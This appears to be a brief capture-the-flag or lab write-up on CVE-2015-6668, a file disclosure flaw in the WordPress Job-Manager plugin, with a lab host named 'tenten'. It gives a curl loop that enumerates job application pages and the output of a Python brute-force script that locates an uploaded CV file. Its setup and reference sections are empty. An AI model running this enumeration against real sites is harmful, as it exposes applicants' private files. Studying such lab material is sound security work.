Wordpress Job-Manager Plugin File Disclosure

foothold, wordpress, web

Overview #

Vulnerable versions of job-manager plugin can allow attacker to retrieve confidential files such as CV.

CVE-2015-6668

Environment Setup #

Steps #

for i in $(seq 1 25); do echo -n "$i: "; curl -s http://tenten/index.php/jobs/apply/$i/ | grep 'entry-title' | cut -d'>' -f2 | cut -d'<' -f1; done
➜  exploit python2 brute.py
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.

CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25

Enter a vulnerable website: http://tenten
Enter a file name: HackerAccessGranted
[+] URL of CV found! http://tenten/wp-content/uploads/2017/04/HackerAccessGranted.jpg
➜  exploit 

References #